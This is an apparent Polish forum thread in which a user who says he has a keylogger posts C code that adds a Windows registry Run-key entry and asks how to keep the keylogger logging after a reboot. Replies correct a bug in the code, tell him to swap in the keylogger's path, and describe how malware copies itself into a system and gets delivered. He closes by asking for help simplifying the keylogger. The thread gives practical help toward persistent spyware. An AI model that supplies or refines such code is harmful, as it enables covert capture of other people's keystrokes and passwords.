Keylogger autostart

sm950

Użytkownik
Dołączył
Sierpień 8, 2012
Posty
62
WITAM

ZNALAZŁEM TAKI KOD:
Kod:
void addRegValue( void ) 
{
 
    HKEY reg;
    LONG result;
 
    result = RegOpenKeyEx( HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", NULL, KEY_ALL_ACCESS, &reg );
    if( result = ERROR_SUCCESS ) puts( "pobieranie uchwytu rejestru [!]\r\n" );
 
    result = RegSetValueEx(reg, "C:\Windows\system32\minehelp.exe",  0, REG_SZ,( LPBYTE ) buf, lstrlen( buf ) + 1 );
    if( result = ERROR_SUCCESS ) puts( "C:\Windows\system32\minehelp.exe" );
}

I MAM PYTANIE BO CHODZI MI GŁÓWNIE DO KEYLOGGERA BO KEYLOGGERA JUŻ MAM ALE CZY JAK TEN KOD TU BYM WCISNĄŁ JAKOŚ DO MOJEGO KEYLOGGERA TO CZY PRZY PONOWNYM URUCHOMIENIU KOMPUTERA KEYLOGGER NADAL BY ZAPISYWAŁ WCIŚNIĘTE KLAWISZE DO PLIKU TEKSTOWEGO BO CZYTAŁEM ŻE NIE ZAWSZE TAK MUSI BYĆ ALE TO NIE WIEM I WŁAŚNIE CHCIAŁBYM SIĘ DOWIEDZIEĆ JAK TO Z TYM JEST.
 

Darxis

Użytkownik
Dołączył
Czerwiec 20, 2011
Posty
8
Kod sam w sobie ma parę błędów chociażby wiersze zawierające "if( result = ERROR_SUCCESS )". Tutaj przypisujemy wartość ERROR_SUCCESS do zmiennej result a chodzi o to żeby sprawdzić czy RegOpenKeyEx i RegSetValueEx się powiodły czyli powinno być "if( result == ERROR_SUCCESS )".
Aby działało z twoim keyloggerem powinieneś zmienić ścieżkę "C:\Windows\system32\minehelp.exe" na tą gdzie jest plik .exe z keyloggerem.
Dodatkowo osoba uruchamiająca program musi mieć dostęp do rejestru.
 

sm950

Użytkownik
Dołączył
Sierpień 8, 2012
Posty
62
Dzięki. Bo mi ogólnie chodzi tak żeby keylogger jak by się na niego klikneło 2 razy pojawiał się w procesach i dopóki się go nie wyłączy będzie wszystko zapisywał do pliku tekstowego. Tylko nie wiem czy ten kod za to odpowiada raczej nie.
 

D.F.

Były Moderator
Dołączył
Listopad 4, 2009
Posty
493
To jest kod dodający się do rejestru, a gdzie kod kopiujący plik do systemu?
 

sm950

Użytkownik
Dołączył
Sierpień 8, 2012
Posty
62
D.F. pierwsze słyszę o kodzie kopiującym plik do systemu. Objaśnij mi co on ma za zadanie nigdy wcześniej nie spotkałem się z tym.
 

Tadeusz Fantom

Użytkownik
Dołączył
Lipiec 2, 2004
Posty
253
D.F. pierwsze słyszę o kodzie kopiującym plik do systemu. Objaśnij mi co on ma za zadanie nigdy wcześniej nie spotkałem się z tym.
Ma za zadanie spowodować skopiowanie pliku i umieszczenie kopii tego pliku w systemie, przeważnie w odpowiednim miejscu systemu.
Plik może znaleźć się jako:
-pobrany przez użytkownika systemu z różnych źródeł
-zamaskowany w pobranym pakiecie
-przesłany z serwera za pomocą połączenia sieciowego
Chyba prościej już nie można wyjaśnić?
 

sm950

Użytkownik
Dołączył
Sierpień 8, 2012
Posty
62
dobra dzięki. A teraz mam jeszcze takie pytanie czy jak bym wstawił kod swojego keyloggera napisali byście może czy da się go jakoś uprościć ?
 
Do góry Bottom